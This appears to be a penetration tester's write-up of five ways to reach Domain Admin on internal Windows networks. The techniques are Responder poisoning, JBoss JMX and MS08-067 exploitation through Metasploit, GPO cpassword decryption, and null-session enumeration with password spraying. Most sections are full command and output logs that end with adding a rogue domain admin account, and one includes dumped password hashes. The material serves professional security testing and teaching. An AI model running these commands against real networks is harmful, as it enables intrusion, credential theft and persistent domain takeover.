1. Netbios and LLMNR Name Poisoning
One of the first things that is kicked off on an internal penetration test is Responder. Laurent Gaffié gifted SpiderLabs with our favorite tool in October 2012. If you would like more in-depth information please visit these links:
http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
Typically, when a Windows workstation needs to request a name lookup, it checks the following 3 places in order: Local Hosts File, Configured DNS Servers, and NetBIOS Broadcasts. If the request fails on both the local hosts file and DNS, it then makes a broadcast NetBIOS request on the local network. Since this is a broadcast request, any system on the local network can answer. Using Responder, SpiderLabs is able to respond as a functional service without the need to ARP spoof (and possibly trigger countermeasures).
In addition, LLMNR poisoning takes advantage of the process by which Windows systems resolve hostnames. After a mistyped hostname is checked in DNS, Windows will take addresses that do not resolve and request the address from the local network through a LLMNR request to determine if the host is on the local network. By responding to these requests, an attacker has the ability to take advantage of these errors and allow these requests to be serviced by the attacker's system. By doing so, the attacker can receive the credentials for Intranet authentication as well as potentially serve malicious pages back to the requester.
引用
~/Responder# python Responder.py -i 192.168.8.25
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:OFF
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.
…snip…
NBT-NS Answer sent to: 192.168.8.6
[+]SMB-NTLMv2 hash captured from : 192.168.8.6
Domain is : BEACONHILLSHIGH
User is : smccall
[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ECONOMY309\IPC$
…snip...
LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.
[+]SMB-NTLMv2 hash captured from : 192.168.8.11
Domain is : BEACONHILLSHIGH
User is : lmartin
[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghash
Share requested: \\ADVCHEM\311IPC$
…snip…
Passwords, whether LM, NTLMv1, or NTLMv2, can be cracked using brute force and dictionary attacks. If a Domain Admin account is captured during a responder session, it can be used to access a computer on the Domain, and a Domain Admin account can easily be created.
Winexe-PTH is software that allows an attacker to execute commands remotely on Windows systems from a Linux system. Common commands that can be run are - cmd.exe, ipconfig, wsftp, vnc, etc. It's used when the Metasploit's psexec module fails to bypass the Anti-virus on the system.
引用
~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
2. Exploitable JBoss Vulnerability
Once the nmap scans are complete and open ports have been listed out, a quick Metasploit auxiliary scan is run to look for JBoss vulnerabilities. JBoss is a Java-based web application server, and the JBoss Java Management Extensions (JMX) console is a web interface for managing the Java resources (mbeans) provided by the JBoss framework. Furthermore, it provides administrative access to JMX functions, including the ability to upload and execute arbitrary JSP packages. Access to the JMX Console therefore ultimately permits an attacker to execute arbitrary code in the context of the web service account.
引用
msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080
~/work/nmap# cat http.jboss.8080
RHOSTS => file:./8080
DICTIONARY => ./http.scan.list
RPORT => 8080
Output from use auxiliary/scanner/http/jboss_vulnscan:
[+] 192.168.5.20:8080 Authenticated using admin:admin
[+] 192.168.5.20:8080 /status does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200)
[+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200)
[+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)
Output from use exploit/multi/http/jboss_maindeployer:
msf exploit(jboss_maindeployer) > exploit
meterpreter > sysinfo
Computer : BHHSMOFF011
OS : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\DELLBAC\EJBContainer\bin>whoami
whoami
beaconhillshigh\backup_admin
C:\>net user twadmin $piD3rsRul3! /add /domain
net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully.
C:\>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain beaconhillshigh.edu.
The command completed successfully
3. MS08-067
It's been over 4 years now, but unpatched MS08-067 machines are still out in the wild. The Microsoft Security Bulletin MS08-067 essentially explains that remote code can be executed on an unpatched Windows systems (Windows Server 2000, Windows Server 2003, and Windows XP) using a specially fashioned RPC request. First nmap is used to check for the vulnerability and then the Metasploit ms08-067_netapi module is used to exploit the vulnerability.
引用
nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA ms08 less ms08.nmap
...snip...
Nmap scan report for shelob-squared (192.168.1.103)
Host is up (0.00042s latency).
Scanned at 2013-09-16 21:52:32 CDT for 55s
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E3:25:78 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
...snip...
Next, the m08-067 Metasploit module is used to attempt to exploit the vulnerability.
引用
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer : SHELOB-SQUARED
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > run hashdump
Frodo:"what do i have"
Samwise:"Frodo"
Stryder:"love"
Legolas:"favorite saying"
Gimli:"what am i"
Boromir:"what I am"
Gandalf:"moria"
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8:::
Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0:::
Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622:::
Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5:::
Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a:::
Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818:::
Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2:::
Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446:::
meterpreter > shell
Process 2708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ WINDOWS\system32>whoami
whoami
MIRKWOOD\Gandalf
C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
4. GPO cpassword
If Domain Admin hasn't been achieved via credentials obtained from running Responder, or dumping hashes on various systems, another place to look is the Domain Controller Policies and Scripts on Windows 2008 servers. Group Policy Objects are used to store profile information about network systems and users to be applied across the domain. Smbclient can be used to grab or put files on target systems or in this case retrieve information from the system directory.
引用
smbclient -W MIRKWOOD -U 'Legolas%orcs' \\\\192.168.1.105\\SYSVOL
Domain=[ MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> dir
. D 0 Wed Sep 15 15:08:37 2012
.. D 0 Wed Sep 15 15:08:37 2012
mirkwood.local D 0 Wed Sep 15 15:08:37 2012
48457 blocks of size 4194304. 44175 blocks available
smb: \> cd mirkwood.local\
smb: \smirkwood.local\> dir
. D 0 Wed Sep 15 15:13:05 2012
.. D 0 Wed Sep 15 15:13:05 2012
Policies D 0 Tue Oct 30 10:29:31 2012
scripts D 0 Thu Nov 8 12:50:21 2012
smb:\> recurse
smb:\> prompt off
smb:\> mget Policies
…snip…
getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec)
getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591 as AutoPlay.admx …snip…
smb:\> recurse
smb:\> prompt off
smb:\> mget scripts
…snip…
smb: \avi\> mget scripts
Get directory scripts? y
Get directory bin? y
Get file #INCLUDE.BAT? y
getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438 as NETLOGON.BAT (28.9 KiloBytes/sec) (average 137.7 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781 as NETLOGON2.BAT (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486 as NETLOGON3.BAT (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec)
getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429 as NETLOGON4.BAT (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec)
…snip
Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):
引用
grep -ri administrator .
grep -ri cpassword .
~/work/nmap/192.168.1.0-24/downloads/Policies# grep -ri administrator .
./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword= "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
The cpassword is taken and run through the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html.
引用
~/work# ruby decrypt.rb
Local*P4ssword!
~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\'Administrator%Local*P4ssword!' --uninstall --system //192.168.1.103 cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
5. NetBIOS Null Enumeration Allowed on Server
This basically allows anyone on the network to query the Domain Controller for a complete list of users, group memberships and lockout policies. After successfully running enum4linux.pl, using grep to discover Domain Admins or Enterprise Admins cuts down on time spent running recovered user credentials against systems. In some cases, Domain Admin has been achieved due to the password being the same as the administrator login.
引用
~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90
~/work/targets/192.168.1.0-24# cat enum-192.168.1.90
Starting enum4linux v0.8.7 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 10 10:15:14 2013
==========================
| Target Information |
==========================
Target ........... 192.168.1.90
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 192.168.1.90 |
===================================================
[+] Got domain/workgroup name: MIRKWOOD
===========================================
| Nbtstat Information for 192.168.1.90 |
===========================================
Looking up status of 192.168.1.90
MODOR <00> - M Workstation Service
MIRKWOOD <00> - M Domain/Workgroup Name
MIRKWOOD <1c> - M Domain Controllers
MORDOR <20> - M File Server Service
MAC Address = B5-AD-2F-37-2G-4F
====================================
| Session Check on 192.168.1.90 |
====================================
[+] Server 192.168.1.90 allows sessions using username '', password ''
…snip…
============================
| Users on 192.168.1.90 |
============================
index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator Name: Administrator Desc: (null)
index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo Name: Frodo Baggins Desc: (null)
index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise Name: Samwise Gamgee User Desc: (null)
index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder Name: Aragorn User Desc: (null)
index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null)
index: 0x1824 RID: 0xb0c acb: 0x00010014 Account: Gimli Name: Gimli son of Glóin Desc: (null)
index: 0x1825 RID: 0xb0d acb: 0x00300014 Account: Boromir Name: Boromir son of Denethor II Desc: (null)
index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf Name: Gandalf the Gray Desc: (null)
index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: gollum Name: gollum Desc: (null)
…snip…
~/work/targets/192.168.1.90# cat enum-192.168.1.90 .txt | grep "Domain Admins"
Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins
Group:[Domain Admins] rid:[0x200]
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman
S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group)
S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group)
~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa
ACCOUNT CHECK: [smbnt] Host: 192.168.1.1 (1 of 62, 0 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.106 (4 of 62, 3 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.107 (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.107 User: gollum Password: gollum [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: 192.168.1.11 (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.11 User: gollum Password: gollum [SUCCESS]
…snip…
~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\ WINDOWS\system32>whoami
whoami MIRKWOOD\gollum
C:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.